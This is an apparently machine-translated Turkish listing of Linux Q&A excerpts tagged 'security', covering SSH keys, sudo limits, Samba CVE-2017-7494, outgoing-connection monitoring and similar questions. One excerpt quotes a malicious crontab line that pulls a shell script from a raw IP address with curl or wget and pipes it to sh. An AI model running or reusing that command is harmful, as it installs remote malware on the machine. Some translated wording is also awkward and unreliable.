«security» etiketlenmiş sorular

Bilgisayar güvenliği ile ilgili içerik, yani gereken politikalar, mekanizmalar vb. İle ilgili içerik, verilerin sızdırılmamasını veya bozulmamasını ve her koşulda hizmetin sunulmasını sağlar.

2
Linux sistemlerinde “WannaCry”: Kendinizi nasıl koruyorsunuz?
Hızlı7 bir makaleye göre , Linux sistemlerinde uzaktan kod yürütülmesine izin veren bazı hassas Samba sürümleri var: İken WannaCry ransomworm Windows sistemleri etkiledi ve net düzeltme adımlarını ile kolayca tanımlanabilir oldu, Samba açığı Linux ve Unix sistemleri etkileyecek ve elde veya uygun İyileştirilmesi dağıtma önemli teknik engellerin sunabilir. CVE-2017-7494 Samba'nın …
3
Sunucu yöneticisi bana kullanmak için özel bir anahtar gönderdi. Neden?
Bir şirketin aşamalı ve canlı sunucularını dağıtım çevremize bağlamak için bir sunucuya erişmem gerekiyordu. Kendi tarafındaki bir yönetici iki örneği ayarladı ve sonra bizim için SSH olarak sunucuda bir kullanıcı yarattı. Bu kadar alışkınım. Aklımda şimdi olan şey, onlara yetkilendirilmiş anahtarlar klasörüne yerleştirilebilecek ortak anahtarımı göndermem olacak. Ancak bunun yerine …
7
Makinemden giden tüm istekleri / bağlantıları nasıl izleyebilirim?
Makinem bir sunucudur, bu yüzden sunucumla yapılan bağlantıları görmezden gelmek istiyorum (örneğin, birileri web sitemi ziyaret ettiğinde). Yalnızca sunucum tarafından başka yerlere yapılan bağlantılar / istekleri görmek istiyorum . Sadece bu giden bağlantıları nasıl görebilirim ? EDIT: Bu tür şeylerde yeniyim. Yapmaya çalıştığım şey sadece sunucumdan herhangi bir şeyin web …
3
Kıvrılma, parolanın ps çıktısında görünmesini nasıl önler?
Bir süre önce curlkomut satırı argümanları olarak verilen kullanıcı adlarının ve parolaların psçıktıda görünmediğini fark ettim (tabii ki bash geçmişinizde görünse de). Aynı şekilde görünmüyorlar /proc/PID/cmdline. (Birleştirilmiş kullanıcı adı / şifre argümanının uzunluğu yine de elde edilebilir.) Aşağıdaki gösteri: [root@localhost ~]# nc -l 80 & [1] 3342 [root@localhost ~]# curl …
18
Kök şifresini değiştiremeyen kök erişimi?
Bir sunucuda küçük bir sorun yaşıyoruz. Bazı kullanıcıların örneğin sudoroot ve root olmasının mümkün olmasını istiyoruz , fakat kullanıcının root şifresini değiştiremeyeceği kısıtlamasıyla. Diğer bir deyişle, diğer kullanıcıların ne yapacaklarından bağımsız olarak bu sunucuya giriş yapabileceğimiz ve kök olacağımızın garantisi. Mümkün mü?
66 ubuntu  security  sudo 
4
Bir komutun geçmişinize eklenmesini engellemenin bir yolu var mı?
Bir komutun geçmişinize eklenmesini engellemenin bir yolu var mı? Geçmiş dosyamdan uzak durmak istediğim bir emir var ve hafızada saklanan geçmişi ararken gerçekten orada olmasını umursamıyorum, ancak bu daha az endişe verici. Bunu önlemenin bir yolu var mı, yoksa sadece geçmiş dosyamı geri alıp düzenlemek zorunda mıyım? güncelleme: Bunun kabuğa …
2
SSH ortak anahtarımı iş için vermek güvenli midir?
Şu anda uzaktan bakım ve yükseltme için sunucularına düzenli olarak erişmemi gerektiren birkaç kuruluş için uzaktan çalışıyorum. RSA genel SSH anahtarımı .ssh/authorized_keysçok daha hızlı giriş yapmama / şifreleri aramak zorunda kalmama izin vermek için dosyaya eklemem güvenli midir? Özel anahtarın kamuoyundan üretilmesinin imkansız olduğu varsayımı altında çalışıyorum, ancak benim varsayımımda …
4
Bölmeyi ayırmak için / var, / home taşınması
Bu kılavuzu okuduktan sonra bazı klasörleri ( /varve gibi /home) ayrı bir bölüme taşımayı deniyorum : 3.2.1 Akıllı bir bölüm şeması seçin Bu kılavuzu izleyerek bir klasörü başarıyla taşıyabildim . Ancak, birden fazla klasör için işe yaramaz gibi görünüyor ve tüm klasörlerim uygun klasörler olmadan bölümlere atılıyor. Ben monte etmek …
2
Her 15 dakikada bir 'xribfa4' çalışan şüpheli crontab girişi
Raspberry Pi'mdeki kök crontab dosyama bir şey eklemek istedim ve bana şüpheli görünen bir girdi buldum, bunun bir kısmını Google'da aradım. Crontab girişi: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh İçeriği http://103.219.112.66:8000/i.sh: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo …
58 security  cron  malware 
2
Chromium seçeneği `- no-sandbox` ne anlama geliyor?
Chromium'u şu şekilde çalıştırıyorum: chromium --no-sandbox Bunu yapıyorum çünkü OpenVZ VM Konteynerinde Debian Squeeze kullanıyorum ve çalışması için tek yol bu. Bunu okumaya devam etsem de korkunç . Ama tam olarak neden olduğunu bilmek istiyorum. Birisi lütfen bana açıklayabilir mi? Birinin zarar görmesi için bilgisayarınıza girmesi gerekiyor mu? Veya güvenlik …
1
Neden ilk 1024 port sadece root kullanıcısı ile sınırlandırılmış?
Bu her şeyden çok boşta meraktır. Bir arkadaşım bana “hangi kök dizinin Linux altında kullanabileceği? Ona 0-1024'ün sınırlı olduğunu söyledim. Sonra neden böyle olduğunu sordu ve ... Kaybettim. Hiçbir fikrim yok. Bu bağlantı noktalarının kısıtlanmasının ve 1025-65535'in olmamasının bir nedeni var mı? Çoğu büyük ağ servisi (HTTP, FTP, SSH, Telnet, …
5
Mutt: şifre güvenli bir şekilde nasıl saklanır?
Benim .muttrc dosyası gibi görünür bu bir veya bir bakış aşağıya bakın. Ben şifre ile tereddüt ediyorum. Kullanmak için şifremi nasıl saklamalıyım mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 
3
Amazon .pem anahtarını Putty .ppk anahtarına dönüştürün Linux
.pemAWS'den özel bir anahtar oluşturdum ve indirdim. Bununla birlikte, sanal makineye bağlanmak için Putty kullanmak için, bu anahtarın .ppkbiçiminde olması gerekir . Dönüşüm süreci burada kabaca 20 satırda detaylandırılmıştır: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Linux Mint (bir Ubuntu dağıtım) kullanıyorum ve terminalde puttygen kullanabileceğimi biliyorum. Ancak, bu aracın nasıl kullanılacağı ve gerekli parametrelerin nasıl …
2
Pidleri olmayan bir süreç nasıl belirlenir?
2 bağlantı noktasını dinleyen bir işlemim var: 45136 / tcp ve 37208 / udp (aslında aynı işlem olduğunu varsayıyorum). Ancak netstat hiçbir şekilde geri ödeme yapmıyor: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - "Grep 37208" ile aynı sonuç. Ben de denedim. lsof -i TCP:45136 Fakat …
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.